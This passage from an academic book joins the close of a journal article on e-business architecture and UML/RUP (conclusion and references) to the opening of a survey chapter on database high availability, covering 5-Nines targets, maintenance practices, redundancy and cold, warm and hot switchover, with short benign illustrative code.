R13. Requirement: The development process should support organizationally both effective control structures and flexibility. Type: O. Rationale: A strong authority is needed to handle the conflicts, and unofficial structures are needed for creative solutions. Support in RUP employing UML: Poor; development organization “design” only at a general level.
Figure 3. Support and requirements: the benefits of UML/RUP and the problems in architecture creation, rated from high to low across the technical, language, and organizational contexts
CONCLUSION
We have described a process in which a large ICT company builds an architecture for a comprehensive e-business system. From the case, we extracted 13 requirements for a methodology supporting integrated e-business systems development and classified the requirements into the technology, language, and organization contexts. We also compared the requirements to the support that UML and RUP offer and concluded that the e-business specific requirements are not met by UML and RUP. Successful e-business development requires alternative approaches that better support organizational change, communication between stakeholders, systems integration, objective formation, and evolutionary development.
In our study, architecture manifested itself as a catalyst that makes business and organizational conflicts and problems concrete. When making decisions about architecture, the systems architects had to take into account the organizational situation in the company. At the same time, the architecture starts shaping and changing the organization, thus forming a double mangle (e.g., Jones, 1998). The architects also realized that technical rationality is not enough for success in this kind of a situation. To succeed in e-business architecture development, one has to be aware of the political and organizational forces that are driving the development and its objectives. E-business architecture development can therefore be characterized as a process of seeking boundaries, finding sufficient consensus, and identifying commonalities across organizational borders. Most previous literature on architectural methods has neglected this and sought to develop description languages for describing the actual architectures of systems with clear problem statements, whereas we claim that it would be more important to seek tools that aid in building a common understanding about the system and its architecture and tools for processing the emerging conflicts. Thus, we maintain that the field of architecture for e-business would benefit more from tools that help to identify and process the emerging conflicts than from tools that aid in developing a technically “perfect” and optimized solution. These tools could be used in the early phases of development to augment UML and RUP based tools. Examples of such tools are group support systems and different participation facilitation systems. Thus we do not call for replacing UML, but rather for adding tools that can be used to communicate with non-technical people about the architecture.
ACKNOWLEDGMENT We would like to thank the anonymous reviewers of this paper for their valuable instructions and especially the reviewer that gave us the simple idea of Figure 3.
REFERENCES
August, J. H. (1991). Joint application design: The group session approach to system design. Englewood Cliffs, NJ: Yourdon Press. Baskerville, R., & Pries-Heje, J. (2001, July 27-29). Racing the e-bomb: How the internet is redefining information systems development methodology. Proceedings of the IFIP TC8/WG8.2 Working Conference on Realigning Research and Practice in Information Systems Development: The Social and Organizational Perspective (pp. 49-68). Boise, Idaho.
Bichler, M., Segev, A., & Zhao, J. L. (1998). Component-based e-commerce: Assesment of current practices and future directions. SIGMOD Record, 27(4), 7-14. Checkland, P. B., & Scholes, J. (1990). Soft system methodology in action. Chichester: John Wiley and Sons. Ciborra, C. (2000). Drifting: From control to drift. In K. Braa, C. Sorensen & B. Dahlbom (Eds.), Planet internet. Lund: Studentlitteratur. Conallen, J. (1999). Modeling web application architectures with UML. Communications of the ACM, 42(10), 63-70. D’Souza, D. F., & Wills, A. C. (1998). Objects, components, and frameworks with UML: The catalysis approach: Addison-Wesley. Dashofy, E. M., Van der Hoek, A., & Taylor, R. N. (2005). A comprehensive approach for the development of modular software architecture description languages. ACM Transactions on Software Engineering and Methodology, 14(2), 199-245. Denzin, N. K. (1978). The research act: A theoretical introduction to sociological methods: McGraw-Hill. Dori, D. (2001). Object-process methodology applied to modeling credit card transactions. Journal of Database Management, 12(1), 4. Egyed, A., & Medvidovic, N. (1999, Oct). Extending Architectural Representation in UML with View Integration. Proceedings of the 2nd International Conference on the Unified Modelling Language (UML), (pp. 2-16). Fort Collins, CO. Eisenhardt, K. M. (1989). Building theories from case study research. Academy of Management Review, 14(4), 532-550. Fernández, W. D., Lehmann, H., & Underwood, A. (2002, June 6-8). Rigour and relevance in studies of IS innovation: A grounded theory methodology
approach. Proceedings of the European Conference on Information Systems (ECIS) 2002, (pp. 110-119). Gdansk, Poland.
Jacobson, I., Booch, G., & Rumbaugh, J. (1999). The unified software development process. New York: Addison-Wesley.
Garlan, D., & Kompanek, A. J. (2000). Reconciling the needs of architectural description with object-modeling notations. Proceedings of the Third International Conference on the Unified Modeling Language - UML 2000, (pp. 498-512). York, UK.
Jones, M. (1998). Information Systems and the Double Mangle: Steering a Course Between the Scylla of Embedded Structure and the Charybdis of Strong Symmetry. IFIP WG8.2/8.6 Joint Working Conference, Helsinki, Finland.
Glaser, B. (1978). Theoretical sensitivity: Advances in the methodology of grounded theory. Mill Valley: Sociology Press. Glaser, B., & Strauss, A. L. (1967). The discovery of grounded theory: Strategies for qualitative research. Chigago: Aldine. Greunz, M., & Stanoevska-Slabeva, K. (2002). Modeling business media platforms. 35th Annual Hawaii International Conference on System Sciences, Maui, HI. Grinter, R. E. (1999). Systems architecture: Product designing and social engineering. ACM SIGSOFT Software Engineering Notes, 24(2), 11-18. Hanseth, O., Monteiro, E., & Hatling, M. (1996). Developing information infrastructure: The tension between standardization and flexibility. Science, Technology & Human Values, 21(4), 407-426. Hirschheim, R., & Klein, H. K. (1989). Four paradigms of information systems development. Communications of the ACM, 32(10), 1199-1216. Hofmeister, C., Nord, R., & Soni, D. (1999a). Applied software architecture. Reading, MA: Addison-Wesley. Hofmeister, C., Nord, R., & Soni, D. (1999b). Describing software architecture with UML. Proceedings of the First Working IFIP Conference on Software Architecture (WICSA1), (pp. 145-160). San Antonio, TX.
Kalakota, R., & Robinson, M. (2001). e-Business 2.0: Roadmap for Success: Addison-Wesley. Kazman, R., Klein, M., & Clements, P. (2000). ATAM: Method for Architecture Evaluation (Technical report No. CMU/SEI-2000-TR-004): Software Engineering Institute. Kim, Y.-G., & Everest, G. C. (1994). Building an IS architecture: Collective wisdom from the field. Information & Management, 26(1), 1-11. Koontz, C. (2000). Develop a solid e-commerce architecture. e-Business Advisor (January). Kuntzmann, A., & Kruchten, P. (2003). The rational unified process—an enabler for higher process maturity. Retrieved April 19, 2007 from http://www-128.ibm.com/developerworks/rational/library/content/03July/0000/0579/Rational_CMM_WhitePaper.pdf. Leist, S., & Zellner, G. (2006, April 23-27). Evaluation of current architecture frameworks. SAC’06, (pp. 1546-1553). Dijon, France. Locke, K. (2001). Grounded theory in management research: SAGE Publications. Lyytinen, K. (1987). A taxonomic perspective of information systems development: Theoretical constructs and recommendations. In R. J. Boland, Jr. & R. A. Hirschheim (Eds.), Critical issues in information systems research (pp. 3-41): John Wiley & Sons. Lyytinen, K., Rose, G., & Welke, R. (1998). The brave new world of development in the internetwork computing architecture (InterNCA): Or how
distributed computing platforms will change systems development. Information Systems Journal, 8(3), 241-253. Lyytinen, K., Smolander, K., & Tahvanainen, V.-P. (1989). Modelling CASE environments in systems development. Proceedings of CASE’89 the First Nordic Conference on Advanced Systems Engineering, Stockholm. Martin, P. Y., & Turner, B. A. (1986). Grounded theory and organizational research. The Journal of Applied Behavioral Science, 22(2), 141-157. Medvidovic, N., Egyed, A., & Rosenblum, D. S. (1999). Round-trip software engineering using UML: From architecture to design and back. Proceedings of the 2nd Workshop on Object-Oriented Reengineering (WOOR), Toulouse, France, Sept. 1999, 1-8. Medvidovic, N., & Taylor, R. N. (2000). A classification and comparison framework for software architecture description languages. IEEE Transactions on Software Engineering, 26(1), 70-93. Merisalo-Rantanen, H., Tuunanen, T., & Rossi, M. (2005). Is extreme programming just old wine in new bottles: A comparison of two cases. Journal of Database Management, 16(4), 41. Monroe, R. T., Kompanek, A., Melton, R., & Garlan, D. (1997). Architectural styles, design patterns, and objects. IEEE Software, 14(1), 43-52. Object Management Group. (1999). UML Profile for Enterprise Distributed Object Computing: Request for Proposals (ad/99-03-10): OMG. Object Management Group. (2005). Unified modeling language: Superstructure version 2.0 (No. formal/05-07-04). Object Management Group. (2006). OMG SysML Specification (ptc/06-05-04). Päivärinta, T., Halttunen, V., & Tyrväinen, P. (2001). A genre-based method for information system planning. In M. Rossi & K. Siau (Eds.),
Information modeling in the new millennium (pp. 70-93). Hershey, PA: Idea Group. Rational Software Corporation. (2001). Rational Unified Process [Online documentation, Version 2001A.04.00]. Robson, C. (2002). Real world research, (2nd ed.). Blackwell Publishing. Ross, J. W., Weill, P., & Robertson, D. C. (2006). Enterprise architecture as strategy: Creating a foundation for business execution: Harvard Business School Press. Rossi, G., & Schwabe, D. (2000). Object-oriented web applications modeling. In M. Rossi & K. Siau (Eds.), Information modelling in the next millennium. Hershey: IDEA Group Publishing. Rumpe, B., Schoenmakers, M., Radermacher, A., & Schürr, A. (1999). UML + ROOM as a Standard ADL. Fifth IEEE International Conference on Engineering of Complex Computer Systems, (pp. 43-53). Saaren-Seppälä, K. (1988). Wall chart technique: The use of wall charts for effective planning. Helsinki: Kari Saaren-Seppälä Ky. Sauer, C., Southon, G., & Dampney, C. N. G. (1997). Fit, failure, and the house of horrors: Toward a configurational theory of IS project failure. Proceedings of the eighteenth international conference on Information systems, (pp. 349-366). Atlanta, Georgia. Shaw, M., & Garlan, D. (1996). Software architecture: Perspectives on an emerging discipline: Prentice Hall. Siau, K. & Cao, Q. (2001). Unified modeling language (UML) — a complexity analysis. Journal of Database Management, 12(1), 26-34. Siau, K., Erickson, J., & Lee, L. Y. (2005). Theoretical vs. practical complexity: The case of UML. Journal of Database Management, 16(3), 40-57.
Smolander, K. (2003, January 6-9,). The birth of an e-business system architecture: Conflicts, compromises, and gaps in methods. Hawaii International Conference on System Sciences (HICSS’36), Hilton Waikoloa Village, Big Island, Hawaii.
Smolander, K., Rossi, M., & Purao, S. (2005, May 26-28). Going beyond the blueprint: Unraveling the complex reality of software architectures. 13th European Conference on Information Systems: Information Systems in a Rapidly Changing Economy, Regensburg, Germany.
Smolander, K., Hoikka, K., Isokallio, J., Kataikko, M., & Mäkelä, T. (2002, April, 8-11). What is included in software architecture? A case study in three software organizations. Proceedings of 9th annual IEEE International Conference and Workshop on the Engineering of Computer-Based Systems (pp. 131-138). (ECBS) 2002, Lund, Sweden.
Sowa, J. F., & Zachman, J. A. (1992). Extending and formalizing the framework for information systems architecture. IBM Systems Journal, 31(3), 590-616.
Smolander, K., & Päivärinta, T. (2002a, May 27-31). Describing and communicating software architecture in practice: Observations on stakeholders and rationale. Proceedings of CAiSE’02 - The Fourteenth International Conference on Advanced Information Systems Engineering, (pp. 117-133). Toronto, Canada. Smolander, K., & Päivärinta, T. (2002b, Aug 25-30). Practical rationale for describing software architecture: Beyond programming-in-the-large. Software Architecture: System Design, Development and Maintenance - IFIP 17th World Computer Congress - TC2 Stream / 3rd Working IEEE/IFIP Conference on Software Architecture (WICSA3), (pp. 113-126). Montréal, Québec, Canada. Smolander, K., Rossi, M., & Purao, S. (2002, December 18). Software architecture: Metaphors across contexts. AIS Theory Development Workshop, Barcelona.
Star, S. L., & Griesemer, J. R. (1989). Institutional ecology, “translations” and boundary objects: Amateurs and professionals in Berkeley’s Museum of Vertebrate Zoology, 1907-39. Social Studies of Science, 19, 387-420. Strauss, A. L., & Corbin, J. (1990). Basics of qualitative research: Grounded theory procedures and applications. Newbury Park, CA: Sage Publications. Taylor, M. J., McWilliam, J., Forsyth, H., & Wade, S. (2002). Methodologies and website development: A survey of practice. Information and Software Technology, 44(6), 381-391. Wood-Harper, T. (1985). Research methods in information systems: Using action research. In E. Mumford, R. A. Hirschheim, G. Fitzgerald & T. Wood-Harper (Eds.), Research methods in information systems. New York: North-Holland Publishers.
This work was previously published in Journal of Database Management, Vol. 19, Issue 1, edited by K. Siau, pp. 19-40, copyright 2008 by IGI Publishing (an imprint of IGI Global).
Chapter 6.2
Database High Availability: An Extended Survey
Moh’d A. Radaideh, Abu Dhabi Police – Ministry of Interior, United Arab Emirates
Hayder Al-Ameed, United Arab Emirates University, United Arab Emirates
ABSTRACT
With the advancement of computer technologies and the World Wide Web, there has been an explosion in the amount of available e-services, most of which involve database processing. Efficient and effective database performance tuning and high availability techniques should be employed to ensure that all e-services remain reliable and available at all times. To avoid the impacts of database downtime, many corporations have taken an interest in database availability. The goal for some is to have continuous availability such that a database server never fails. Other companies require their content to be highly available. In such cases, short and planned downtimes would be allowed for maintenance purposes. This chapter is meant to present the definition, the background, and the typical measurement factors of high availability. It also demonstrates some approaches to minimize a database server’s shutdown time.
INTRODUCTION
High availability of software systems has become very critical due to several factors that are related
to the environment, processes and development strategies, hardware complexity, and the amount of money and human resources invested in the system. High availability cannot be achieved by just implementing a given service level or solution. Systems should be designed such that all factors that may lead the system to go down are well treated, if not eliminated. In today’s competitive business landscape, 24/7 operations have become the standard, especially for e-services-driven areas (e.g., e-commerce, e-government, e-learning, etc.). Downtime of applications, systems, or networks typically translates into significant revenue loss. Industry experts and analysts agree that, in order to support e-service applications, network availability must reach 99.999%. In other words, networks must be at the “5-Nines” availability level (Providing Open Architecture, 2001). Reaching this level of availability requires careful planning and a comprehensive end-to-end strategy. To demonstrate the impact of not being at the “5-Nines” availability level, a system with 97% availability will incur approximately 263 hours (about 11 days) of downtime per year. With 99 percent availability, downtime will be 88 hours (about 3.7 days) per year. Table 1 summarizes the impact of service downtime according to the availability ratings. High availability is not achieved through a single product or process. It is the result of an end-to-end analysis and reengineering of the entire service chain, including the combination of people, processes, and technological factors (Otey & Otey, 2005). Every device or circuit in the path between client and server is a link in this service chain, and each must be considered separately. A chain is only as strong as its weakest link. As more applications are delivered via Web browsers, the emphasis for high availability is spreading from back-end databases toward front-end and middleware devices like Web servers and firewalls. Database management systems (DBMS) play a pivotal role in much of today’s business computing environment, underpinning electronic services
operations, providing critical business support through data warehousing and mining, and managing the storage and processing of much of the world’s financial data. As they are entrusted with the storage and processing of such critical data, one would assume that databases are designed to be reliable and highly available. This chapter provides an overview of high availability in general and describes the business drivers behind it and how it is measured. It focuses on the meaning of database high availability and on the functionality and design strategies that emerge with the shift from a technology-centric orientation of keeping the system running to a more customer-centric focus on ultra-dependable services. The view of high availability provided in this chapter has no bias towards the high availability practices offered today by the different DBMS vendors. This chapter is organized into seven sections. The first section provides a generic introduction to the chapter’s subject. The second section overviews high availability-related issues. The third section discusses the model environment for highly available systems. The fourth section discusses several strategies for database high availability. The fifth section discusses the performance impact of high availability. The sixth section overviews several high availability solutions. The seventh section overviews a simple availability-benchmarking methodology.
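To make the downtime arithmetic quoted in the introduction easy to reproduce, the short Python sketch below converts an availability percentage into expected downtime per year. It is a minimal illustration under our own assumptions (a 365-day year; the function name and output format are ours, not from the chapter).

```python
# Annual downtime implied by an availability percentage.
# Assumes a 365-day year (8,760 hours); names are illustrative only.

HOURS_PER_YEAR = 365 * 24  # 8760


def annual_downtime_hours(availability_percent: float) -> float:
    """Return the expected hours of downtime per year at the given availability."""
    unavailable_fraction = 1.0 - availability_percent / 100.0
    return unavailable_fraction * HOURS_PER_YEAR


if __name__ == "__main__":
    for availability in (97.0, 99.0, 99.9, 99.99, 99.999):
        hours = annual_downtime_hours(availability)
        if hours >= 1.0:
            print(f"{availability:7.3f}% -> {hours:8.1f} hours/year ({hours / 24:.1f} days)")
        else:
            print(f"{availability:7.3f}% -> {hours * 60:8.1f} minutes/year")
```

Running it reproduces the figures cited above: roughly 263 hours per year at 97% availability, about 88 hours at 99%, and around five minutes at the 5-Nines (99.999%) level.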
HIGH AVAILABILITY OVERVIEW
A system is composed of a collection of interacting components. A system provides one or more services to its consumers. A service is the output of a system that meets the specification for which the system was devised, or agrees with what system users have perceived as the correct output values. Service failures are incorrect results with respect to the specification or unexpected behavior perceived by the users of the service. The cause of
a failure is said to be a fault. Faults are identified or detected in some manner, either by the system or by its users. Finally, an error is a discrepancy between the displayed output (e.g., computed, measured, or observed value or condition) and the correct or specified value or condition. Errors are often the result of exceptional conditions or unexpected interference. If an error occurs, then a failure of some form has occurred. Similarly, if a failure occurs, then an error of some form will occur. It is important to detect not only active faults, but also the latent faults. Finding and removing these faults before they become active leads to less downtime and higher availability. Availability is defined as the readiness for usage. The continuation of service, in the absence of failure, is called reliability. The nonoccurrence of catastrophic consequences or injury to the environment or its users is called safety. Businesses have crossed geographical, cultural, and political boundaries in today’s world. Information is the key for survival in the highly competitive global business environment. High availability of information requires information technology resources to be available round the clock, seven days a week, 365 days a year. Availability is generally understood as the percentage of the time a system is up and running. Once the terms that describe availability are understood, it is then necessary to understand the various availability paradigms and solutions. Solutions include data redundancy, system failover, and network redundancy. These solutions can be combined to provide a highly available system that provides the necessary level of service to the users of the system. The paradigms involve the ways that these solutions are combined.
Achieving 5-Nines Availability
The 99.999% (5-Nines) availability standard specifies 24/7 service with a maximum of five minutes of downtime in a year. Generally, service availability depends heavily on the fault tolerance of the system, including hardware redundancy (Klein, 1988). The software components of the system use the redundant hardware to enable service and application availability. 5-Nines implementations have their foundation in a set of principles. Some of these principles are related only to hardware, while other principles are related to software system components. The following list of issues focuses on providing service high availability (Parikh, 2004):
• Mitigation of risks: Risk mitigation depends on monitoring (real-time and historical) trends, rules, and models to predict the occurrence of failures and to prevent them. Common risk mitigation techniques are:
o Fault avoidance: use of processes and tools to minimize the introduction of faults;
o Fault minimization: In spite of efforts to prevent or eliminate them, there will be faults in any system. Proper risk assessment and fault minimization can ensure uptime; and
o Fault recognition and removal: Monitoring and recognition can actively locate faults and assist with remediation of their root cause (a minimal probe sketch follows this list).
• Resiliency: the capability of a system to prevent degradation or failure as well as to minimize the damage or loss from a failure or malfunction; resiliency is affected by quality, design, and stability.
• Redundancy: the use of multiple redundant critical components, such as CPUs, network cards, electrical transmission, power supplies, disk drives, switches, routers, cooling systems, and other equipment used to support operations; redundancy is not limited to hardware, it can also include mirrored applications or databases, setup, and configuration files.
• Inclusion: including high availability through the entire application stack, including the client, middleware, and hardware.
• Serviceability: the ability of the service to detect and rapidly correct problems and reconfigure itself online.
• Manageability: the ease and ability to evaluate and tune for maintenance and availability, to identify critical resources, traffic patterns, and performance levels, and to configure business-critical applications.
• Methods and skills: To achieve a 5-Nines environment, the administration, monitoring, and control of the high availability IT environment must be simple. Otherwise, installation issues, upgrades, human error, and customization will affect the system’s availability. Because user error is a growing cause of outages, techniques need to be applied to reduce the chance of user/administrator error.
• Scalability: Scalability of the system, network, database, and applications is the key to availability. An available, well-defined, and properly configured scalable platform is one that has enough capacity to handle the estimated or measured application workload, with no bottleneck in the hardware. For the software division, achieving the goal of scalability, and therefore dependability and availability, requires effort at all phases of development: design time, implementation time, execution time, and during maintenance.
• System architecture: Poor architecture planning or operational support can foster poor performance, impeded functionality, high cost of ownership, complex administration, lack of capacity and scalability, and poor reliability and availability. A properly developed system, on the other hand, is one that is of high quality, high performance, and high availability, with a capacity for growth. Proper database system architecture requires understanding the business requirements. The points that should be considered
in planning the architecture of any system might be the storage and I/O subsystem, ability to support growth, well-defined use and capacity planning, elimination of data redundancy, elimination of process redundancy, implementation and integration planning, and administration automation.
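As a concrete illustration of the fault recognition and removal point in the list above, the following minimal sketch polls a health check and raises an alert after several consecutive failures, so that a latent fault can be remediated before it turns into an outage. The probe callable, threshold, interval, and alert hook are hypothetical names introduced here for illustration; they are not part of the chapter.

```python
# Minimal fault-recognition loop: poll a health check, count consecutive
# failures, and raise an alert before the fault turns into a full outage.
# check_service, FAILURE_THRESHOLD, and alert() are illustrative assumptions.

import time
from typing import Callable

FAILURE_THRESHOLD = 3        # consecutive failed probes before alerting
PROBE_INTERVAL_SECONDS = 10  # how often the probe runs


def alert(message: str) -> None:
    """Placeholder for a real notification channel (pager, e-mail, ticket)."""
    print(f"ALERT: {message}")


def monitor(check_service: Callable[[], bool]) -> None:
    """Long-lived probe loop; check_service returns True when the service is healthy."""
    consecutive_failures = 0
    while True:
        healthy = False
        try:
            healthy = check_service()
        except Exception as exc:          # a probe error counts as a failed check
            alert(f"health probe raised: {exc}")

        if healthy:
            consecutive_failures = 0
        else:
            consecutive_failures += 1
            if consecutive_failures >= FAILURE_THRESHOLD:
                alert(f"service unhealthy for {consecutive_failures} probes "
                      f"(~{consecutive_failures * PROBE_INTERVAL_SECONDS}s)")

        time.sleep(PROBE_INTERVAL_SECONDS)
```

In practice the probe would typically be a lightweight query issued over the same path the clients use, so that the check exercises the whole service chain rather than a single component.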
Maintaining Uptime and Availability
Uptime refers to the ability to conduct business in the event of partial system failure or unexpected demand. Organizations can prioritize, modularize, and segregate their business functions, provide redundancies, and establish processes to turn pieces of their system on or off and still continue to function. Availability is a measure of the ability of clients to connect with and use a resource at any point in time. Carrier-class Information Technology (IT) infrastructures are the new standard for high-availability, zero-downtime computing enterprises that serve a global customer base on a 24/7/365 basis (Barraza, 2002). As the world becomes more wired and huge new global Web services become available, there will be no alternative to carrier-class services (Lemme & Colby, 2001). The impact of any downtime will simply become too traumatic for companies to opt for anything less than the most reliable quality of service available. In order to improve service uptime and availability, a set of maintenance issues should be taken into consideration:
• Data protection: Any data critical to the business needs to be protected; backups are the easiest way to protect such data. Even with frequent backups, one should still employ data protection safeguards through the use of hardware, replication, or software to bridge backup periods.
• Disaster recovery: The capability to recover from natural disasters, such as fires, floods, earthquakes, or tornados, is as important as
being able to recover from a hardware or software failure. Results of these disasters usually include physical damage or complete loss of systems, data, and even workplaces. Recovery time is directly related to how much upfront planning occurred and what procedures were established to restore the business locally. The impact and likelihood of a disaster and its cost to the business must be weighed against the cost of preventing the damage that results from such a disaster.
• Application protection and recovery: Web servers are an excellent example of why application recoverability is a critical issue. Most companies with e-commerce servers cannot afford the business impact of unplanned downtime. Companies should give careful consideration to the design and use of an application in a high availability situation, with the primary goal being to insulate the users from outages or system failures. Methods include employing client reconnect to an alternative server if a connection is lost, using error handling, automating tasks, and setting up recoverable transactions.
• Network management: The network has become ubiquitous in the computing environment. Proper network architecture, planning, maintenance, and monitoring are just as important as with any other system components or applications.
• System management monitoring and measurement: Database administrators often overlook the planning and selection of the architecture, procedures, and system-management processes. A vast majority of installations occur on an existing platform because of available space. Then, after the application is in production, performance and administration problems appear. To combat this cycle, systems must be properly planned, architected, and refined through a
set of methods and processes. It is not enough to slap in a set of monitoring tools and expect them to take care of all deficiencies. True system management involves monitoring, measuring, altering, and reporting on the levels of availability, performance, and service. System-management tools can also provide real-time business applications for the many operational components. System management usually begins with taking measurements, setting baselines for uptime, and establishing performance metrics.
• Automating processes: Human errors are the leading cause of downtime; any effort to reduce human interaction with the system will reduce the risk of human errors. In order to eliminate downtime, tools should be employed to perform the systems’ automation, control, or monitoring. Risk reduction might be implemented through the use of automation in several areas such as backups and recovery, upgrades, operations and administration, maintenance, usage, security, and control (see the backup sketch after this list).
• Training and support: Training and support are critical to sustain and maintain availability. With technology and product updates, personnel must be able to quickly judge which features and upgrades map to existing business requirements. Annual training as well as participation in user groups can help users keep abreast of issues, features, and technologies.
• Standards and documentation: The written standards and procedures should provide the foundation for implementation. Without consistent standards and procedures, a project will decline into an indecipherable hodgepodge of unsupportable variations and techniques. Documentation is also important for employees new to the department or database. Standards, procedures, and documentation for the 5-Nines environment should include the following (Lemme, 2002):
o Operating system (OS) standards and procedures: These include file system layouts, kernel parameters, system backup/recovery, security, performance monitoring, installation, and upgrades of the operating system.
o Database standards and procedures: These include instance parameters, object sizing, storage and naming conventions, procedures for installation and upgrades, security guidelines, and backup/recovery plans.
o Application development standards: These include techniques for managing change procedures, detailed coding standards including source code control, change control, naming conventions, and table/index creation.
o Network standards and procedures: These define network addressing and protocols supported for database and application communication.
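As a small example of the backup automation mentioned in the “Automating processes” item above, the sketch below takes a timestamped database dump and prunes old copies. The pg_dump command, paths, database name, and retention count are illustrative assumptions only; any dump or export utility could be substituted.

```python
# Minimal backup-automation sketch: take a timestamped dump and prune old
# copies. The dump command, directory, and retention policy are assumptions.

import subprocess
from datetime import datetime
from pathlib import Path

BACKUP_DIR = Path("/var/backups/appdb")   # illustrative location
RETAIN_LAST = 7                            # keep the seven most recent dumps


def run_backup(database: str) -> Path:
    """Dump the database to a timestamped file and return its path."""
    BACKUP_DIR.mkdir(parents=True, exist_ok=True)
    stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
    target = BACKUP_DIR / f"{database}-{stamp}.dump"
    # pg_dump is used here purely as an example of a dump utility.
    subprocess.run(["pg_dump", "--format=custom", f"--file={target}", database],
                   check=True)
    return target


def prune_old_backups() -> None:
    """Delete all but the most recent RETAIN_LAST dump files."""
    dumps = sorted(BACKUP_DIR.glob("*.dump"))
    for old in dumps[:-RETAIN_LAST]:
        old.unlink()


if __name__ == "__main__":
    run_backup("appdb")
    prune_old_backups()
```

Scheduled from cron or a job scheduler, a script like this removes one of the routine manual tasks that the chapter identifies as a leading source of human error.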
High Availability (Reliability, Redundancy, and Service Availability)
Convergence of data communication, electronic, and Web services technologies has created demand for ever-increasing levels of availability. The 5-Nines (99.999%) system availability is no longer enough. Now network users, for instance, are demanding and expecting continuous delivery of voice, data, and multimedia services: They want always-on services and connections that are maintained without disruption regardless of any internal system faults or failures. A Service Availability solution is a customer-centric approach to meeting these demands (Service Availability, 2000). Conceptualization and design for availability have been technology-centric: Providing robust hardware, adding redundancy in case of failure, and improving switchover techniques to backup components have produced the current generation of high-availability strategies. These strategies provide higher levels of system uptime, but the service availability approach requires this and more. Undisrupted service means preserving application data and state across switchover scenarios. It requires aggressive optimization and integration of all system resources, and it requires a global perspective focused on the end-user experience of continuous service. In the subsequent paragraphs, the detailed meanings of reliability, redundancy, and high and service availability are discussed; in addition, the three switchover modes are described, with the main differences between them summarized in Table 2.

Table 2. The main differences between the three switchover modes

Cold switchover. Technique used: Initialization of the standby component upon switchover. Recovery time: Slowest. Maintains transaction state: No. Notes: Conserves power and resources.

Warm switchover. Technique used: Data can be saved to the standby component, but the application needs to be configured at the time of switchover, adding restart time to the switchover process. Recovery time: Slow. Maintains transaction state: No. Notes: Cannot support uninterrupted connections during switchover.

Hot switchover. Technique used: Application and transaction state data must be continuously checkpointed to the standby device, faults must be quickly detected, and the system must be reconfigured. Recovery time: Fastest. Maintains transaction state: Yes. Notes: Complex to implement.
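To make the differences summarized in Table 2 concrete, the following sketch models a 2N active/standby pair in which the standby’s mode determines whether checkpointed transaction state survives a switchover. The classes, method names, and the in-memory “checkpoint” are our own simplifications for illustration, not an implementation prescribed by the chapter.

```python
# Illustrative model of cold/warm/hot switchover in a 2N pair.
# Timings and the checkpoint mechanism are assumptions for the sketch only.

from dataclasses import dataclass, field


@dataclass
class Standby:
    mode: str                                  # "cold", "warm", or "hot"
    checkpointed_state: dict = field(default_factory=dict)

    def receive_checkpoint(self, state: dict) -> None:
        """Hot standby: continuously mirror the active node's transaction state."""
        if self.mode == "hot":
            self.checkpointed_state = dict(state)

    def take_over(self) -> dict:
        """Return the state available after switchover; behavior mirrors Table 2."""
        if self.mode == "cold":
            # Must be initialized first: slowest recovery, all in-flight state lost.
            return {}
        if self.mode == "warm":
            # Application restarts on the standby: in-flight transactions are lost.
            return {}
        # Hot: checkpointed transaction state survives, fastest recovery.
        return self.checkpointed_state


@dataclass
class ActiveNode:
    standby: Standby
    state: dict = field(default_factory=dict)

    def commit(self, txn_id: str, payload: str) -> None:
        self.state[txn_id] = payload
        self.standby.receive_checkpoint(self.state)   # no-op unless standby is hot


if __name__ == "__main__":
    for mode in ("cold", "warm", "hot"):
        active = ActiveNode(standby=Standby(mode=mode))
        active.commit("txn-1", "order 42")
        recovered = active.standby.take_over()        # simulate failure of the active node
        print(f"{mode:5s} switchover -> recovered state: {recovered}")
```

Running the example shows the hot standby recovering the committed transaction while the cold and warm standbys come up empty, which is exactly the “maintain transaction state” distinction in the table.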
• Reliability—Designing with integrity (hardware orientation): Reliability is a measure of how dependable a system is once it is actually put into use (not breaking down). Designing for reliability aims at fault prevention. In designing for availability, it is predicted that components will fail, and systems are designed to mask and recover from the failure of individual resources. Originally, the reliability strategy was: first, build great hardware that does not break down, and then, to be completely covered, supply a backup system just in case. Reliability, while effective for hardware, is not enough when complex software is also involved. Software is inherently less reliable, as every possible configuration of use and data cannot be tested prior to release; therefore, software glitches are often revealed only when the software is actually put into use. As systems become more and more software-driven, fault prevention has become an unrealizable standard, now replaced by fault management. The notion of reliability has had to be reconsidered in system design.
• Redundancy—Replacement parts (component orientation): Building with redundancy addresses potential failures by establishing a backup system for critical components. Full 2N redundancy is the
duplication of components such that each active component has its own backup. It is the simplest redundancy configuration to manage, since processes can be mirrored on the redundant standby system for total system failover, if needed. But full redundancy is often prohibitively expensive, unnecessary, and impractical for complex systems (High Availability and More, 2001). Utilizing redundancy in complex systems requires dynamic system reconfiguration in order for the system to remain available. When redundancy is designed into a system, the system downtime is a factor of the frequency of failures multiplied by the time required to switch over to a standby component. Standby redundant components in the 2N design can be configured in one of the following three switchover modes; Table 2 summarizes the main features of the three modes.
o Cold switchover: This mode requires initialization of the standby component upon switchover. Of the three, this mode has the slowest recovery time, and it cannot maintain transaction state; however, it does conserve power and resources.
o Warm switchover: Data can be saved to the standby component, but the application needs to be configured at the time of switchover, adding restart time to the switchover process. This mode cannot support uninterrupted connections during switchover (if an application has to be rebooted when a server fails, transactions in process at the time of the failure are lost).
o Hot switchover: This mode has the fastest recovery time, but it is the most complex to implement: Application and transaction state data must be continuously checkpointed to the standby device, faults must be quickly detected,
and the system must be reconfigured. Hot switchover redundancy designs support the higher levels of availability, but simply having redundancy does not by itself produce system availability; it is the management of hardware, software, and data redundancy, the management of faults, and the management of system reconfiguration that yields availability.
• High availability (system orientation): Internet-based services and businesses need always-on availability. In availability management, hardware or software faults are considered unavoidable, and the system is designed to anticipate and work around faults before they become system failures. Thus, instead of counting on the hardware to avoid faults, availability design, and especially high availability design, relies heavily on management software to mask and manage faults that are expected to occur (Service Availability, 2000). Fault management takes practical precedence over designing for fault avoidance; the goal is to anticipate faults and execute fault recovery as quickly as possible. In the race towards ever greater levels of system availability, providing the quickest possible recovery times becomes the key. Availability management software must execute the fastest possible switchover to redundant resources and immediate reconfiguration of the system. In addition, 5-Nines levels of system availability cannot tolerate downtime for upgrading or maintenance, so high availability management must be able to handle hardware and software upgrades without taking the system out of service. These requirements are all necessary for providing system availability, but they do not fully account for the needs of customers using the systems.
